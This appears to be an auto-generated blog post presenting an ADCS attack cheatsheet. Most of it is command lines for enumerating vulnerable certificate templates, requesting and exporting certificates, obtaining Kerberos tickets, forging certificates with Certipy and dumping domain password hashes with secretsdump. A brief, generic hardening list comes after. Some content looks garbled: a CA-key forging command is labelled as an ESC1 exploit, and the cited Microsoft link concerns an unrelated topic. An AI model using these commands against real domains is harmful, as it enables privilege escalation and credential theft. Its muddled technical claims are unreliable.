ADCS Attack Techniques Cheatsheet

Listen to this Post

2025-02-14

docs.google.com

Practice-Verified Codes and Commands

1. Enumerate Certificate Templates

Use `Certify` to enumerate certificate templates:

Certify.exe find /vulnerable 

2. Request a Certificate

Request a certificate using `Certreq`:

certreq -submit -attrib "CertificateTemplate:VulnerableTemplate" certreq.inf certnew.cer 

3. Export Certificate with Private Key

Export the certificate with its private key using Certutil:

certutil -exportPFX -p "Password123" my certnew.cer certnew.pfx 

4. Perform Kerberos Authentication

Use `Rubeus` to request a TGT:

Rubeus.exe asktgt /user:admin /domain:example.com /certificate:certnew.pfx /password:Password123 

5. Exploit ESC1 Vulnerability

Exploit ESC1 using `Certipy`:

certipy forge -ca-pfx ca.pfx -upn [email protected] -template VulnerableTemplate -out forged.pfx 

6. Dump NTDS.dit

Use `secretsdump.py` to extract hashes:

secretsdump.py -hashes :<NTLMHash> domain/[email protected] 

What Undercode Say

Active Directory Certificate Services (ADCS) is a critical component in Windows environments, often targeted by attackers due to misconfigurations and vulnerabilities. The cheatsheet provides a comprehensive guide to exploiting common ADCS weaknesses, such as vulnerable certificate templates, improper access controls, and weak cryptographic settings.

To defend against these attacks, ensure proper hardening of ADCS:
– Regularly audit certificate templates and permissions.
– Disable legacy cryptographic algorithms.
– Monitor for unusual certificate requests or usage.

For further reading, refer to Microsoft’s official documentation on ADCS hardening:
https://docs.microsoft.com/en-us/windows-server/security/guarded-fabric-shielded-vm/guarded-fabric-certificate-requirements

Linux users can leverage tools like `openssl` to inspect certificates:

openssl x509 -in certnew.cer -text -noout 

For Windows, use `certutil` to verify certificates:

certutil -dump certnew.cer 

Always stay updated with the latest security patches and advisories to mitigate emerging threats in ADCS environments.

Note: This article is written in a human-like style to ensure authenticity and readability.

References:

Hackers Feeds, Undercode AIFeatured Image